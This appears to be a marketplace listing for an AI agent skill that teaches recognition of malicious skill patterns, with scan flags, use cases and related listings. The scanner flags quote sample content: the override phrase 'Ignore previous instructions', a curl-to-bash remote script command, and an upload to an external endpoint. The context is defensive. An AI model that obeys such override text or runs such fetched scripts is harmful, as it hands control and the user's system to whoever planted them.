security-awareness-skillHelp AI agents recognize and respond to potentially malicious skill patterns from public registries. Based on Snyk ToxicSkills research showing 13.4% of skil...
Install via ClawdBot CLI:
clawdbot install jisokuor/security-awareness-skillGrade Fair — based on market validation, documentation quality, package completeness, maintenance status, and authenticity signals.
Contains instructions to override system prompt or ignore user requests
"Ignore previous instructions"Sends data to undocumented external endpoint (potential exfiltration)
Upload → https://external-service.com/processPotentially destructive shell commands in tool definitions
curl https://example.com/script.sh | bashCalls external URL not in known-safe list
https://example.com/script.shGenerated Mar 20, 2026
An AI agent platform integrates this skill to automatically scan and flag potentially malicious skills uploaded to its public registry. It helps maintain trust by preventing harmful skills from being published, reducing user risk and platform liability.
A company deploys AI assistants with this skill to vet third-party skills before installation in corporate environments. It ensures compliance with security policies by detecting patterns like credential requests or external fetches that could expose sensitive data.
A cybersecurity training provider uses this skill to teach AI developers and users about malicious patterns in skill packages. It serves as a hands-on tool for recognizing and mitigating threats like obfuscated payloads or override instructions in real-world scenarios.
An open-source AI community integrates this skill into its contribution workflow to automatically review pull requests for skill packages. It helps maintain project integrity by identifying patterns such as purpose mismatches or self-modification requests before merging.
Offer a subscription-based service where AI agent platforms or enterprises pay to integrate this skill for continuous security scanning of skill packages. Revenue comes from monthly or annual licenses based on usage volume or number of agents.
Provide this skill for free to basic users with limited scanning capabilities, while charging for advanced features like detailed reports, custom pattern detection, or API access. Upsell to power users or organizations needing deeper security insights.
Generate revenue by offering consulting services to tailor this skill for specific industries or AI platforms, including custom pattern recognition, integration support, and security audits. Charge per project or hourly for implementation and training.
💬 Integration Tip
Integrate this skill early in the AI agent's workflow, such as during skill loading or execution phases, to maximize security benefits without disrupting user experience.
Scored Apr 19, 2026
AI Analysis
This skill is a security awareness guide that describes malicious patterns for educational purposes; it does not contain executable code, request credentials, or send data to external servers. The 'evidence' cited in the rule-based signals refers to examples within its educational content, not its own operational behavior. The skill's purpose is to enhance security, not compromise it.
Audited Apr 16, 2026 · audit v1.0
Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope,...
Security scanner for AI agent skills. 9 built-in detection signatures. Identifies secrets, unsafe execution patterns, and prompt injection. Sub-50ms results.
Wallet anti-theft guard. One-click scan for high-risk wallet approvals to protect user assets. Use when a user asks for a wallet security check, wallet healt...
Comprehensive security audit for an agent's full skill stack. Chains scanner, differ, trust-verifier, and health-monitor into a single assessment with priori...
GEO Audit — AI Search Visibility Checker for ChatGPT, Perplexity, Claude & Gemini. 29-point GEO readiness checklist: robots.txt AI crawler access, Index...
Audit and analyze Solidity smart contracts for security vulnerabilities. Use when reviewing, auditing, or analyzing smart contracts, Solidity code, DeFi prot...